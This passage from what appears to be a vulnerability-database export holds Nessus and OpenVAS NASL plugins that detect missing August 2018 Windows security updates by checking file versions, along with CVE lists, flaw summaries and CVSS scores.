(CVE-2018-8401, CVE-2018-8405,\n CVE-2018-8406)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)\");\n # https://support.microsoft.com/en-us/help/4343887/windows-10-update-kb4343887\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93e63484\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4343887 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343887');\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, 
share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343887])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-08T13:28:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8343", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8341", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8340", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343898", "modified": "2019-12-20T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813846", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813846", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343898)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343898)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the 
implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813846\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-8316\",\n \"CVE-2018-8339\", \"CVE-2018-8340\", \"CVE-2018-8341\", \"CVE-2018-8343\",\n \"CVE-2018-8344\", \"CVE-2018-8345\", \"CVE-2018-8348\", \"CVE-2018-8349\",\n \"CVE-2018-8351\", \"CVE-2018-8353\", \"CVE-2018-8355\", \"CVE-2018-8371\",\n \"CVE-2018-8372\", \"CVE-2018-8373\", \"CVE-2018-8385\", \"CVE-2018-8389\",\n \"CVE-2018-8394\", \"CVE-2018-8398\", \"CVE-2018-8403\", \"CVE-2018-8404\",\n \"CVE-2018-8405\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 13:48:12 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343898)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343898\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel vulnerability known as L1 Terminal\n Fault.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Windows kernel improperly handles objects in memory.\n\n - NDIS fails to 
check the length of a buffer prior to copying memory to it.\n\n - Active Directory Federation Services (AD FS) improperly handles multi-factor\n authentication requests.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Internet Explorer improperly validates hyperlinks before loading executable\n libraries.\n\n - Scripting engine handles objects in memory in Microsoft browsers.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - Microsoft browsers improperly access objects in memory.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - The DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in\n memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343898\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"mshtml.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"11.0.9600.19101\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\mshtml.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 11.0.9600.19101\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:05:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8360", 
"CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343885", "modified": "2020-06-04T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813844", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813844", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343885)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343885)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813844\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-0952\",\n \"CVE-2018-8200\", \"CVE-2018-8204\", \"CVE-2018-8266\", \"CVE-2018-8316\",\n \"CVE-2018-8339\", \"CVE-2018-8341\", \"CVE-2018-8343\", \"CVE-2018-8344\",\n \"CVE-2018-8345\", \"CVE-2018-8347\", \"CVE-2018-8348\", \"CVE-2018-8349\",\n \"CVE-2018-8350\", \"CVE-2018-8351\", \"CVE-2018-8353\", \"CVE-2018-8355\",\n \"CVE-2018-8357\", \"CVE-2018-8360\", \"CVE-2018-8370\", \"CVE-2018-8371\",\n \"CVE-2018-8372\", \"CVE-2018-8373\", \"CVE-2018-8381\", \"CVE-2018-8385\",\n \"CVE-2018-8388\", \"CVE-2018-8389\", \"CVE-2018-8390\", \"CVE-2018-8394\",\n \"CVE-2018-8398\", \"CVE-2018-8399\", \"CVE-2018-8401\", \"CVE-2018-8403\",\n \"CVE-2018-8404\", \"CVE-2018-8405\", \"CVE-2018-8406\", \"CVE-2018-8414\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 13:17:43 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343885)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343885\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution 
side channel vulnerability known as L1 Terminal\n Fault.\n\n - Diagnostics Hub Standard Collector allows file creation in arbitrary locations.\n\n - Multiple security feature bypass vulnerability exists in Device Guard.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer improperly validates hyperlinks before loading executable\n libraries.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - Windows kernel and DirectX Graphics Kernel (DXGKRNL) driver improperly handles\n objects in memory.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - An improper processing for a .LNK file.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Microsoft browsers allowing sandbox escape.\n\n - Microsoft Edge improperly handles redirect requests and specific HTML content.\n\n - Microsoft .NET Framework improperly access information in multi-tenant environments.\n\n - WebAudio Library improperly handles audio requests.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows PDF Library improperly handles objects in memory.\n\n - Windows Shell does not properly validate file paths.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released 
updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343885\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.1265\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.1265\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8377", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8400", "CVE-2018-8355", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8385", 
"CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8340", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343897", "modified": "2020-06-04T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813842", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813842", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343897)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343897)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813842\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-0952\",\n \"CVE-2018-8200\", \"CVE-2018-8204\", \"CVE-2018-8266\", \"CVE-2018-8350\",\n \"CVE-2018-8316\", \"CVE-2018-8339\", \"CVE-2018-8340\", \"CVE-2018-8341\",\n \"CVE-2018-8343\", \"CVE-2018-8344\", \"CVE-2018-8345\", \"CVE-2018-8347\",\n \"CVE-2018-8348\", \"CVE-2018-8349\", \"CVE-2018-8351\", \"CVE-2018-8353\",\n \"CVE-2018-8355\", \"CVE-2018-8357\", \"CVE-2018-8377\", \"CVE-2018-8360\",\n \"CVE-2018-8370\", \"CVE-2018-8371\", \"CVE-2018-8372\", \"CVE-2018-8373\",\n \"CVE-2018-8381\", \"CVE-2018-8385\", \"CVE-2018-8390\", \"CVE-2018-8389\",\n \"CVE-2018-8394\", \"CVE-2018-8398\", \"CVE-2018-8401\", \"CVE-2018-8403\",\n \"CVE-2018-8399\", \"CVE-2018-8400\", \"CVE-2018-8404\", \"CVE-2018-8405\",\n \"CVE-2018-8406\", \"CVE-2018-8414\", \"CVE-2018-8388\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 12:31:47 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343897)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343897\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", 
value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel vulnerability known as L1 Terminal\n Fault.\n\n - Diagnostics Hub Standard Collector allows file creation in arbitrary locations.\n\n - Multiple security feature bypass vulnerability exists in Device Guard.\n\n - Microsoft Windows PDF Library improperly handles objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer improperly validates hyperlinks before loading executable\n libraries.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - Active Directory Federation Services (AD FS) improperly handles multi-factor\n authentication requests.\n\n - Windows kernel, DirectX Graphics Kernel (DXGKRNL) driver and Win32k component\n improperly handles objects in memory.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - An improper processing for a .LNK file.\n\n - Windows kernel fails to properly handle parsing of certain symbolic links.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Microsoft browsers allowing sandbox escape.\n\n - Microsoft Edge improperly handles redirect requests and specific HTML content.\n\n - Microsoft .NET Framework improperly access information in multi-tenant environments.\n\n - WebAudio Library improperly handles audio requests.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Microsoft Edge improperly accesses objects in memory.\n\n - Windows Shell does not properly validate file paths.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further 
compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343897\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.610\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.610\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8342", "CVE-2018-8343", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", 
"CVE-2018-3646", "CVE-2018-8397", "CVE-2018-8316", "CVE-2018-8396", "CVE-2018-8373", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8346", "CVE-2018-8341", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343900", "modified": "2020-06-04T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813845", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813845", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343900)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343900)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813845\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-8316\",\n \"CVE-2018-8339\", \"CVE-2018-8341\", \"CVE-2018-8342\", \"CVE-2018-8343\",\n \"CVE-2018-8345\", \"CVE-2018-8348\", \"CVE-2018-8349\", \"CVE-2018-8344\",\n \"CVE-2018-8351\", \"CVE-2018-8353\", \"CVE-2018-8355\", \"CVE-2018-8346\",\n \"CVE-2018-8371\", \"CVE-2018-8372\", \"CVE-2018-8373\", \"CVE-2018-8385\",\n \"CVE-2018-8389\", \"CVE-2018-8394\", \"CVE-2018-8396\", \"CVE-2018-8397\",\n \"CVE-2018-8398\", \"CVE-2018-8403\", \"CVE-2018-8404\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 13:17:43 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343900)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343900\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel vulnerability known as L1 Terminal\n Fault.\n\n - Internet Explorer improperly validates hyperlinks before loading executable\n libraries.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading 
behavior.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - An improper processing for a .LNK file.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Microsoft browsers allowing sandbox escape.\n\n - Microsoft Edge improperly handles redirect requests and specific HTML content.\n\n - Microsoft .NET Framework improperly access information in multi-tenant environments.\n\n - WebAudio Library improperly handles audio requests.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows PDF Library improperly handles objects in memory.\n\n - Windows Shell does not properly validate file paths.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
